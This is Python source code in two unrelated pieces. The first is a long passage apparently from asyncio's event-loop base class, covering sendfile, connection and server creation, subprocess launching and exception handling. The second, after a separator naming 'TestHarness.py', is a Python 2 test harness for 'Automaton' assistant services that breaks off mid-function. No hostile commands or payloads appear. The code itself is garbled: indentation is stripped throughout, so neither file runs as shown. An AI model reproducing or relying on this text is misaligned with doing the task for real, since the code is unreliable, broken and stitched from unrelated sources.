# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
f"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and not ssl:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
                    'host and port were not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
        sending the file until EOF is reached. The file position is updated
        on return, and also in case of error, in which case file.tell()
        can be used to figure out the number of bytes
        which were sent.
        fallback set to True makes asyncio manually read and send
        the file when the platform does not support the sendfile syscall
        (e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
if not (isinstance(addr, tuple) and len(addr) == 2):
raise TypeError('2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and ssl is None:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == "posix" and sys.platform != "cygwin"
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout,
ssl_shutdown_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and not ssl:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
        New keys may be introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
TestHarness.py
|
import re
import threading
import time
import automaton.lib.exceptions as exceptions
# Format:
# key: scriptname, value: list of tuples to check
# tuple[0]: argument string
# tuple[1]: expected response (as regexp or straight string)
def notmatch(s):
return "^((?!%s).)*$" % s
test_data = {"echo": [("hello", "hello")],
"exe": [("echo hello", "hello")],
"gettime": [("", "\d{1,2}:\d{1,2} (A|P)M"),
("24", "\d{1,2}:\d{1,2}")],
"google": [("hello world", "A Hello world program is a computer.+")],
"latitude": [("", notmatch("Error")),
("noreverse", "\(-?\d+(\.\d+)?, -?\d+(\.\d+)?\)")],
"mail": [("", notmatch("Error"))],
"map": [("college station, texas to houston, texas",
notmatch("malformed"))],
"memo": [("testing success", "Inserted into memo file.")],
"music": [("play", notmatch("Error"))],
"pandora": [("g", notmatch("Error"))],
"say": [("This is a test of Automaton text to speech", "")],
"schedule": [("echo done! in ten and a half seconds", "Command scheduled."),
("echo first in one second", "Command scheduled."),
("echo absolute at 10:05pm", "Command scheduled."),
("echo absolute at 5:00 A.M.", "Command scheduled."),
("echo absolute at 5:00:4 AM", "Command scheduled."),
("echo absolute at 5:55", "Command scheduled.")],
"weather": [("", "(There is no weather data for this location)|"
"(The weather.+)"),
("Houston,tx", "(There is no weather data for this location)|"
"(The weather.+)"),
("last", "Data for.+")],
"wiki": [("hello", "\"Hello is a salutation or greeting.+")],
}
tests = ["google", "exe", "gettime", "echo", "google", "latitude", "mail", "map",
"weather", "wiki", "say"]
def test_client(client):
success = set()
failure = {}
for key in test_data:
if key in tests:
print "testing {0}...".format(key)
try:
if client.isService(key):
client.allowService(key)
for test in test_data[key]:
resp = client.interpret(" ".join([key, test[0]])).strip()
match = re.match(test[1] + "$", resp, flags=re.DOTALL)
if match and key not in failure:
success.add(key)
else:
failure[key] = "expected \"{0}\", got \"{1}\"".format(test[1], resp)
success.discard(key)
break
else:
failure[key] = "not loaded."
try:
text = client.serviceUsage(key)
if len(text) == 0:
failure[key + "-help"] = "Help is empty."
except AttributeError:
if "help" not in failure:
failure["help"] = "client.serviceUsage cannot be found"
except Exception as e:
failure[key] = "encountered exception during execution: " + e
success.discard(key)
if len(success) > 0:
print "Successful execution for:"
for script in success:
print " ", script
if len(failure) > 0:
print
print "Failed execution for:"
for key in failure:
print " ", key, ":", failure[key]
def test_server():
from automaton.server.pyro import PyroServer
import automaton.client.pyro as pyro
print "Starting test server"
server = PyroServer(port = 9090)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
success = set()
failure = {}
try:
client = pyro.ClientWrapper(appname="testharness",port=9090)
test = "interpreting without registering"
try:
client.interpret("echo hello")
failure[test] = "Requesting service should fail."
except exceptions.ClientNotRegisteredError:
success.add(test)
client.open()
print "Starting server Testing..."
test = "serviceNotProvidedError"
try:
try:
client.allowService("asdkjhasdkjh")
failure[test] = "somehow registered service with random name..."
except exceptions.ServiceNotProvidedError:
success.add(test)
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "allowAllServices"
try:
client.allowAllServices()
try:
client.interpret("echo hello")
success.add(test)
except exceptions.ServiceNotRegisteredError:
failure[test] = "allowAllServices did not enable echo service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "disallowService"
try:
client.disallowService("echo")
try:
client.interpret("echo hello")
failure[test] = "disallowService did not disable echo service"
except exceptions.ServiceNotRegisteredError:
success.add(test)
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "allowService"
try:
client.allowService("echo")
try:
client.interpret("echo hello")
success.add(test)
except exceptions.ServiceNotRegisteredError:
failure[test] = "allowService did not enable echo service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "isService"
try:
if client.isService("echo"):
success.add(test)
else:
failure[test] = "Failed to determine echo as a service"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
test = "getAvailableServices"
try:
if len(client.getAvailableServices()) > 0:
success.add(test)
else:
failure[test] = "No available services"
except Exception as e:
failure[test] = "Unknown exception encountered: " + e
if len(success) > 0:
print "Successful execution for:"
for script in success:
print " ", script
if len(failure) > 0:
print
print "Failed execution for:"
for key in failure:
print " ", key, ":", failure[key]
client.close()
except pyro.ClientException as tx:
print 'Client exception encountered: ' + tx.message
server.daemon.shutdown()
def test_pyro():
from automaton.server.pyro import PyroServer
import automaton.client.pyro as pyro
print "Starting Pyro Server"
server = PyroServer(port = 9092)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
try:
client = pyro.ClientWrapper(appname="testharness",port=9092)
client.open()
